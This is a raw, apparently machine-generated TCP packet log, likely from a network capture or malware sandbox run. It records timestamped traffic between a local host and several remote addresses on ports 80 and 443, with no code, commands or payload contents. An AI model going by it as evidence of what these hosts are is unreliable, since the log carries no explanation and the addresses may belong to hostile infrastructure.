                                                                                                                                                              Dec 18, 2024 11:47:49.523111105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.523128986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.523204088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.523204088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.524132967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.524151087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.524210930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.524210930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.525265932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.525285006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.525321007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.525332928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.526386023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.526432991 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.526633024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.526671886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.527749062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.527764082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.527792931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.527805090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.528642893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.528659105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.528685093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.528697014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.529827118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.529844999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.529870987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.529886961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.531029940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.531049013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.531074047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.531100035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.532289982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.532305956 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.532367945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.532367945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.662524939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.662539005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.662595987 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.662621021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.663064957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.663281918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.663325071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.664220095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.664352894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.664393902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.665436029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.665462017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.665509939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.666599035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.666652918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.666657925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.666703939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.667843103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.667855024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.667885065 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.667897940 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.668953896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.668967009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.669003010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.669012070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.670164108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.670177937 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.670229912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.670239925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.671437979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.671452045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.671490908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.671500921 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.672503948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.672552109 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.673161030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.673702955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.673717976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.673744917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.673772097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.675004959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.675019026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.675061941 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.676311016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.676323891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.676369905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.677093983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.677135944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.677364111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.678272009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.678316116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.678366899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.678428888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.679529905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.679541111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.679575920 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.680571079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.680613995 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.680618048 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.680644989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.681801081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.681813002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.681853056 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.681864977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.682960033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.682971954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.683013916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.684215069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.684382915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.684767008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.684814930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.685281038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.685293913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.685337067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.686510086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.686523914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.686570883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.687621117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.687666893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.687844992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.688266039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.689125061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.689138889 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.689181089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.690021992 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.690047979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.690073013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.690100908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.691731930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.691745043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.691787004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.691801071 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.692282915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.692853928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.692908049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.693980932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.693993092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.694044113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.694072962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.695331097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.695344925 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.695382118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.696403027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.696600914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.697029114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.697041035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.697073936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.697211027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.699111938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.699170113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.699174881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.699624062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.699733973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.699745893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.699783087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.700715065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.700757027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.700905085 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.701337099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.701649904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.701690912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.701844931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.701883078 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.702898026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.702909946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:49.702939034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:49.702955008 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:52.104978085 CET4987380192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:52.105359077 CET4990680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:52.224939108 CET8049873185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:52.225008965 CET4987380192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:52.225195885 CET8049906185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:52.225265980 CET4990680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:52.225466967 CET4990680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:52.346198082 CET8049906185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:52.771852970 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:52.771991014 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:52.772115946 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:52.804671049 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:52.804693937 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:53.569057941 CET8049906185.215.113.43192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:53.569166899 CET4990680192.168.2.6185.215.113.43
                                                                                                                                                              Dec 18, 2024 11:47:53.571858883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:53.572391987 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:53.691773891 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:53.691883087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:53.691946030 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:53.692071915 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:53.692250013 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:53.811655998 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:54.532862902 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:54.533457041 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:54.533483982 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:54.534627914 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:54.534702063 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:54.536262035 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:54.536372900 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:54.552387953 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:54.552426100 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:54.601881027 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:55.009430885 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009485960 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009497881 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009582996 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009594917 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009605885 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009610891 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.009618998 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009646893 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.009665012 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.009717941 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009730101 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009742975 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.009764910 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.009797096 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.129379988 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.129422903 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.129517078 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.133491993 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.133565903 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.200720072 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.200762987 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.200783968 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.200805902 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.204550982 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.204588890 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.204622984 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.204646111 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.212928057 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.214432001 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.215919018 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.215997934 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.216007948 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.216053963 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.224415064 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.224471092 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.224528074 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.224575043 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.232660055 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.232732058 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.232742071 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.232981920 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.241096020 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.241189957 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.241269112 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.249797106 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.249896049 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.249963999 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.257884979 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.257932901 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.257978916 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.258014917 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.266251087 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.266311884 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.266385078 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.266433954 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.274595022 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.274682999 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.274748087 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.282999039 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.283068895 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.283070087 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.283118010 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.320413113 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.320524931 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.391721964 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.391781092 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.391827106 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.391855955 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.394090891 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.394107103 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.394155025 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.398953915 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.399017096 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.399058104 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.399110079 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.513854980 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.513876915 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.513947010 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.518563032 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.518583059 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.518651962 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.518779993 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.518872976 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.521298885 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:55.562815905 CET49908443192.168.2.698.85.100.80
                                                                                                                                                              Dec 18, 2024 11:47:55.562860012 CET4434990898.85.100.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.633497953 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.633518934 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.633574009 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.637969971 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.637985945 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.638041973 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753132105 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753150940 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753163099 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753174067 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753191948 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753225088 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753236055 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753247023 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753257036 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753262997 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753262997 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753268957 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753281116 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753293037 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753304958 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753321886 CET4991080192.168.2.631.41.244.11
